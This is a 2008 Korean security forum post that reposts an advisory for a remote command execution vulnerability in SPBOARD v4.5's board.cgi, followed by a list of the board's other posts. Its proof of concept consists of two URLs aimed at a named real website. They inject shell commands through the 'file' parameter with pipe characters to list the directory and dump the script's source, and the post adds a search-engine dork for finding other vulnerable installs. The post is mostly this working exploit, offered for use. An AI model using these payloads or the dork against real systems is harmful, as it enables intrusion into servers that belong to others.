JJooN.net - Study - Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability

Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability

바이쭌

http://jjoon.net/zbxe/12013

2008.10.30 02:30:16 (*.246.9.232)

319

Web

Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability

Script : ):

POC :

|---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file

|---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file

|---> Open By Mozilla Firefox

Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5

이 게시물을..

엮인글 주소 : http://jjoon.net/zbxe/12013/205/trackback

번호

글쓴이

조회수

날짜

Python whois tool

바이쭌

2008-12-08

Python Command Line Argument

바이쭌

2008-12-08

Web Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability

바이쭌

320

2008-10-30

RFID Anatomy of a Subway Hack file

바이쭌

159

2008-10-14

RFID RFID 전자여권 관련 동영상 movie

바이쭌

147

2008-10-14

RFID RFIDIOts!!! - Practical RFID Hacking (Without Soldering Irons) file

바이쭌

158

2008-10-14

RFID Vulnerabilities in First-Generation RFID-Enabled Credit Card movie

바이쭌

114

2008-10-14

Web Apache Tomcat Directory Traversal Vulnerability

바이쭌

483

2008-08-21

Security 태권-V팀의 Defcon CTF 참가 후기

바이쭌

415

2008-08-21

Programming C#에서 Win32 API 사용하기

바이쭌

608

2008-08-16